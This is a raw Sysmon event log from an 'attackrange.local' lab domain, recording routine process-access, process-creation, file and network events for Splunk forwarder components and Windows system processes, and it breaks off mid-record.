08:07:50.773{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.773{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F856-60EB-F37D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.757{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F856-60EB-F37D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.759{466BC892-F856-60EB-F37D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.588{466BC892-F856-60EB-F27D-00000000CF01}101249508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.573{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08BC543EC0E92A1759585B3183E7E23A,SHA256=109BE6D7B7FCE5E667ED286BB42D25D2AD1E40E9848AFFDE85C4B74BF79254B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810399Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:50.314{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4D062A6445AEE046E86C9A7318D0303,SHA256=AC0388033A361D4EB72A1F5BB5CEAC40A48733EF9A79973880FFE02F8B8D9A61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.218{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F856-60EB-F27D-00000000CF01}10124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.218{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.218{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.218{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.218{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F856-60EB-F27D-00000000CF01}10124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.218{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.218{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F856-60EB-F27D-00000000CF01}10124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.205{466BC892-F856-60EB-F27D-00000000CF01}10124C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.888{466BC892-F857-60EB-F47D-00000000CF01}55567576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.657{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F857-60EB-F47D-00000000CF01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.641{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.641{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.641{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.641{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F857-60EB-F47D-00000000CF01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.641{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.641{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F857-60EB-F47D-00000000CF01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.637{466BC892-F857-60EB-F47D-00000000CF01}5556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.620{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3487712212761D1B7B016EF7195EA823,SHA256=C24F690F898EF185FD0E5A52F2368F4B08024FACBF0537735BBA1292AE7C76B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810400Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:51.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5391DDC1C3D2C5CF5C90B6341F6C71D2,SHA256=3A4A526E8246EE0B40E3808EB789D7B857A5599669476168A4F48051B57E72AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:51.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=228704EB42040B39A7D7F3D18812C1AB,SHA256=6F691244E5F43DA38D787A3706E036827B4CE496D1145E228CDF24F5D2ED7448,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:44.761{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61969-false10.0.1.12-8000- 354300x80000000000000001054735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:44.588{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-64873-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001054734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.842{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F858-60EB-F67D-00000000CF01}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.842{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:52.842{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 